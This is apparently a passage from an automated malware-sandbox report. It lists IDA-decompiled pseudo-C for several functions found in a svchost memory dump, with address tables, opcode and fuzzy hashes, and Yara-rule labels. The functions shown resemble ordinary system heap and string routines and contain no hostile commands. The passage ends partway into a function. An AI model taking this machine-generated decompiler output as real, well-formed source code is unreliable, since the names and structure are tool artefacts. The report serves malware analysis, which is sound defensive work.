                                          0x03a54e57
                                          0x00000000
                                          0x00000000
                                          0x03a54e1b
                                          0x03a54e30
                                          0x03a54e5b
                                          0x03a54e5b
                                          0x00000000
                                          0x03a54e30
                                          0x03a54e11
                                          0x03a54e11
                                          0x03a54e16
                                          0x00000000
                                          0x03a54e16
                                          0x03a54e01
                                          0x00000000
                                          0x03a54e01
                                          0x03a54da5
                                          0x03a96c6b
                                          0x00000000
                                          0x03a54dab
                                          0x03a54dab
                                          0x00000000
                                          0x03a54dab

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d12ee5ddb2445a77c9e1f62b78ae4c18d7a8fb1a3076558b391d32f9152add5b
                                          • Instruction ID: 76e7761d9572f72f480ca5a635025bb5caf973ba90c2955c8baee54d9b9b0960
                                          • Opcode Fuzzy Hash: d12ee5ddb2445a77c9e1f62b78ae4c18d7a8fb1a3076558b391d32f9152add5b
                                          • Instruction Fuzzy Hash: F041D175A40318AFEB21DF15CD84BAAB7A9EB49610F08009BFD059B380D774ED80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A38A0A Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E03A38A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x3b1d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E03A6B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E03A3E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3a01180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03A51DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03A63C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03A38999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                          0x03a38a0a
                                          0x03a38a1c
                                          0x03a38a23
                                          0x03a38a2e
                                          0x03a38a30
                                          0x03a38a36
                                          0x03a38a3c
                                          0x03a38a3e
                                          0x03a38a4a
                                          0x03a38a52
                                          0x03a38a9c
                                          0x03a38aae
                                          0x03a38a58
                                          0x03a38a5e
                                          0x03a38a6a
                                          0x03a38a6f
                                          0x03a38a75
                                          0x03a38a7d
                                          0x03a38a85
                                          0x03a38a86
                                          0x03a38a89
                                          0x03a38a93
                                          0x03a38a99
                                          0x03a38a9b
                                          0x00000000
                                          0x03a38aaf
                                          0x03a38abe
                                          0x03a38ac3
                                          0x03a38acb
                                          0x03a38ad7
                                          0x03a38ae0
                                          0x03a38af1
                                          0x00000000
                                          0x03a38af1
                                          0x03a38acd
                                          0x03a38ad5
                                          0x03a38afb
                                          0x03a38afd
                                          0x03a38aff
                                          0x03a38b07
                                          0x03a38b22
                                          0x03a38b24
                                          0x03a38b2a
                                          0x03a38b2e
                                          0x03a38b3f
                                          0x03a38b78
                                          0x03a38b41
                                          0x03a38b52
                                          0x03a38b54
                                          0x03a38b5c
                                          0x03a38b74
                                          0x03a38b74
                                          0x03a38b5c
                                          0x03a38b3f
                                          0x03a38b5e
                                          0x03a38b61
                                          0x03a38b64
                                          0x03a38b64
                                          0x03a38b6c
                                          0x03a38b6c
                                          0x03a38b11
                                          0x03a89cd5
                                          0x03a89cd5
                                          0x03a38b17
                                          0x03a38b1a
                                          0x03a38b1a
                                          0x00000000
                                          0x03a38ad5
                                          0x03a38a89

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33d7e3872780172c797329fe8bc6d43d604f02ee7da6a0199de6e988778692c9
                                          • Instruction ID: bc06a0530e195945d76ee0fcecae2b64ac3eddf8f174f942be9a34c26d85fc90
                                          • Opcode Fuzzy Hash: 33d7e3872780172c797329fe8bc6d43d604f02ee7da6a0199de6e988778692c9
                                          • Instruction Fuzzy Hash: AE415FB5A0032D9BDB24DF15C888AA9B7BCEB45300F1545EBF81997351E7749E88CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AEAA16 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03AEAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E03AEABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E03AEAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E03AEAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E03ACCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L03A477F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03A47D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E03AE131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E03ACCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                          0x03aeaa1f
                                          0x03aeaa21
                                          0x03aeaa23
                                          0x03aeaa2b
                                          0x03aeaa30
                                          0x03aeaa36
                                          0x03aeaa39
                                          0x03aeaa42
                                          0x03aeaa75
                                          0x03aeaa7a
                                          0x03aeaa7c
                                          0x03aeaa7c
                                          0x03aeaa88
                                          0x03aeaa8a
                                          0x03aeaa8f
                                          0x03aeab02
                                          0x03aeab04
                                          0x03aeaa99
                                          0x03aeaaa8
                                          0x03aeaaaf
                                          0x03aeaab3
                                          0x03aeaacc
                                          0x03aeaad1
                                          0x03aeaad6
                                          0x03aeaae0
                                          0x03aeaaf3
                                          0x03aeaaf9
                                          0x03aeaafe
                                          0x03aeaafe
                                          0x03aeaaf3
                                          0x03aeaad6
                                          0x03aeaab3
                                          0x03aeab07
                                          0x03aeab0a
                                          0x03aeab11
                                          0x03aeab23
                                          0x03aeab13
                                          0x03aeab1c
                                          0x03aeab1c
                                          0x03aeab2b
                                          0x03aeab44
                                          0x03aeab44
                                          0x03aeab51
                                          0x03aeab51
                                          0x03aeaa44
                                          0x03aeaa47
                                          0x03aeaa4c
                                          0x00000000
                                          0x00000000
                                          0x03aeaa5a
                                          0x03aeaa64
                                          0x03aeaa72
                                          0x00000000
                                          0x03aeaa66
                                          0x03aeaa66
                                          0x03aeaa68
                                          0x03aeaa6a
                                          0x00000000
                                          0x03aeaa6a

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: c7573e67e4ddfb25133a142720d3486d56ec0cea4cbcb8ebb2e96e0803b74c74
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: 7531E036F10244ABDB15DBA9CD95BAFF7BBEF84210F09806FE805AB391DA749D00C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AEFDE2 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E03AEFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E03AEFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03AF0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03A47D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03AE1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03AF2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E03AEC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E03AEDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03A47D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E03AEA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                          0x03aefde7
                                          0x03aefde8
                                          0x03aefdec
                                          0x03aefdee
                                          0x03aefdf5
                                          0x03aefdf7
                                          0x03aefdfc
                                          0x03aefe19
                                          0x03aefe22
                                          0x03aefe26
                                          0x03aefec6
                                          0x03aefecd
                                          0x03aefed5
                                          0x03aefee7
                                          0x03aefed7
                                          0x03aefee0
                                          0x03aefee0
                                          0x03aefeef
                                          0x03aeff00
                                          0x03aeff02
                                          0x03aeff07
                                          0x03aeff07
                                          0x00000000
                                          0x03aefeef
                                          0x03aefe33
                                          0x03aefe55
                                          0x03aefe59
                                          0x03aefe5b
                                          0x03aefe5e
                                          0x03aefe69
                                          0x03aefe6d
                                          0x03aefe6d
                                          0x03aefe69
                                          0x03aefe35
                                          0x03aefe41
                                          0x03aefe41
                                          0x03aefe79
                                          0x03aefe8b
                                          0x03aefe7b
                                          0x03aefe84
                                          0x03aefe84
                                          0x03aefe93
                                          0x00000000
                                          0x03aefea8
                                          0x03aefeba
                                          0x00000000
                                          0x03aefeba
                                          0x03aefdfe
                                          0x03aefe01
                                          0x03aefe02
                                          0x03aefe08
                                          0x03aeff0c
                                          0x03aeff14
                                          0x03aeff14

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: 51717d3144da48bc2532a17b057d415f4d05129749f74bca36136bf9195328ae
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: 1E310436300740AFD722DB68C954F6ABBAAEBC5650F1E455AE8468B382DA75EC41C720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AEEA55 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E03AEEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03A42280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E03AEE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E03A2F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E03A3FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E03AEAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E03AEBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03A47D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E03ADFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E03A3FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E03AEA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                          0x03aeea55
                                          0x03aeea66
                                          0x03aeea68
                                          0x03aeea6c
                                          0x03aeea6f
                                          0x03aeea72
                                          0x03aeea75
                                          0x03aeea7a
                                          0x03aeea7a
                                          0x03aeea7e
                                          0x03aeea80
                                          0x03aeea85
                                          0x03aeea8b
                                          0x03aeeab5
                                          0x03aeeabc
                                          0x03aeeabf
                                          0x03aeeabf
                                          0x03aeeaca
                                          0x03aeeace
                                          0x03aeead0
                                          0x03aeeae4
                                          0x03aeeaeb
                                          0x03aeeaf0
                                          0x03aeeaf5
                                          0x03aeeb09
                                          0x03aeeb0d
                                          0x03aeeb1d
                                          0x03aeeb2d
                                          0x03aeeb38
                                          0x03aeeb3d
                                          0x03aeeb41
                                          0x03aeeb4a
                                          0x03aeeb60
                                          0x03aeeb4c
                                          0x03aeeb52
                                          0x03aeeb59
                                          0x03aeeb59
                                          0x03aeeb68
                                          0x03aeeb71
                                          0x03aeeb71
                                          0x03aeea8d
                                          0x03aeea8f
                                          0x03aeea92
                                          0x03aeea97
                                          0x03aeea97
                                          0x03aeea9b
                                          0x03aeea9c
                                          0x03aeea9e
                                          0x03aeeaa6
                                          0x03aeeaa6
                                          0x03aeeb7e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: 7e4391cb249e958aae9fa17259fa4bd9ad1d783a3bbfa317b2206d348514a121
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: 303170766047059BC719DF24C994E6BB7A9FBC4210F048A2EF9568B744DA31E805CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA69A6 Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E03AA69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x3b1d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03A36C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03AA6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03A69980() >= 0) {
							E03A42280(_t56, 0x3b18778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3b18774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3b18774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E03A2B6F0(0x3a0c338, 0x3a0c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03A69520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E03A695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E03A3FFB0(_t68, _t77, 0x3b18778);
				}
				_pop(_t78);
				return E03A6B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                          0x03aa69b5
                                          0x03aa69be
                                          0x03aa69c3
                                          0x03aa69c9
                                          0x03aa69cc
                                          0x03aa69d1
                                          0x03aa69d3
                                          0x03aa69de
                                          0x03aa69e1
                                          0x03aa69ea
                                          0x03aa69f6
                                          0x03aa69fe
                                          0x03aa6a13
                                          0x03aa6a14
                                          0x03aa6a15
                                          0x03aa6a16
                                          0x03aa6a1e
                                          0x03aa6a26
                                          0x03aa6a31
                                          0x03aa6a36
                                          0x03aa6a37
                                          0x03aa6a40
                                          0x03aa6a49
                                          0x03aa6a4a
                                          0x03aa6a53
                                          0x03aa6a59
                                          0x03aa6a5d
                                          0x03aa6a5e
                                          0x03aa6a64
                                          0x03aa6a67
                                          0x03aa6a6a
                                          0x03aa6a6d
                                          0x03aa6a70
                                          0x03aa6a77
                                          0x03aa6a7d
                                          0x03aa6a86
                                          0x03aa6a89
                                          0x03aa6a9c
                                          0x03aa6a9f
                                          0x03aa6aa2
                                          0x03aa6aa5
                                          0x03aa6aaf
                                          0x03aa6ab1
                                          0x03aa6ab8
                                          0x03aa6ab9
                                          0x03aa6abb
                                          0x03aa6abe
                                          0x03aa6ac5
                                          0x03aa6ac5
                                          0x03aa6aaf
                                          0x03aa6a40
                                          0x03aa6a26
                                          0x03aa69fe
                                          0x03aa6ace
                                          0x03aa6ad0
                                          0x03aa6ad3
                                          0x03aa6ad8
                                          0x03aa6adf
                                          0x03aa6adf
                                          0x03aa6ae8
                                          0x03aa6aef
                                          0x03aa6aef
                                          0x03aa6af9
                                          0x03aa6b06

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50f38a92bb24fce9e59e7366cfca366e66b270084f061f22abcd6642c75d5c38
                                          • Instruction ID: a3ffd0449bb119de04ad64b06d6d5e19e0b0ca68aa1014bcec02b74f32a8724b
                                          • Opcode Fuzzy Hash: 50f38a92bb24fce9e59e7366cfca366e66b270084f061f22abcd6642c75d5c38
                                          • Instruction Fuzzy Hash: 79416CB2E00708AFDB14DFA9D940BAEFBF4EF48714F08852AE814A7250DB709905CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A25210 Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E03A25210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E03A252A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E03A695D0();
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E03A3EB70(_t54, 0x3b179a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E03A695D0();
								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E03A3EB70(_t54, 0x3b179a0);
						}
						return _t52;
					}
					L5:
					_t33 = E03A6F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E03A3EB70(_t54, 0x3b179a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E03A695D0();
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                          0x03a25220
                                          0x03a25224
                                          0x03a80d13
                                          0x03a80d16
                                          0x03a80d19
                                          0x03a2522a
                                          0x03a2522a
                                          0x03a2522d
                                          0x03a2522d
                                          0x03a25231
                                          0x03a25235
                                          0x03a25239
                                          0x03a80d5c
                                          0x03a80d62
                                          0x00000000
                                          0x00000000
                                          0x03a80d6a
                                          0x03a80d7b
                                          0x03a80d7f
                                          0x03a80d81
                                          0x03a80d84
                                          0x03a80d95
                                          0x03a80d95
                                          0x03a80d6c
                                          0x03a80d71
                                          0x03a80d71
                                          0x03a80d9a
                                          0x00000000
                                          0x03a2524a
                                          0x03a2524a
                                          0x03a25250
                                          0x03a80d24
                                          0x03a80d35
                                          0x03a80d39
                                          0x03a80d3b
                                          0x03a80d3e
                                          0x03a80d50
                                          0x03a80d50
                                          0x03a80d26
                                          0x03a80d2b
                                          0x03a80d2b
                                          0x00000000
                                          0x03a80d55
                                          0x03a25256
                                          0x03a2525b
                                          0x03a25265
                                          0x03a80da7
                                          0x03a2526b
                                          0x03a2526e
                                          0x03a25272
                                          0x03a80db1
                                          0x03a80db4
                                          0x03a80dc5
                                          0x03a80dc5
                                          0x03a25272
                                          0x03a25278
                                          0x03a2527e
                                          0x03a2528a
                                          0x03a2528c
                                          0x03a2528d
                                          0x00000000
                                          0x03a25280
                                          0x03a25282
                                          0x03a25288
                                          0x03a2529f
                                          0x03a25292
                                          0x00000000
                                          0x03a25292
                                          0x00000000
                                          0x03a25288
                                          0x03a2527e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58790ea76959908ff89632295d381863e2865ff7172e46ec57ba7e5dc62ac584
                                          • Instruction ID: 1349a3567e036c7c8ebc605598dec7ec9049028bdbc34758d6d13c81cae740c5
                                          • Opcode Fuzzy Hash: 58790ea76959908ff89632295d381863e2865ff7172e46ec57ba7e5dc62ac584
                                          • Instruction Fuzzy Hash: D531A231641710EBC72AEB18CE41B66BBA5BF41764F15462BE4554B6A0EB70E804C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5A61C Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E03A5A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
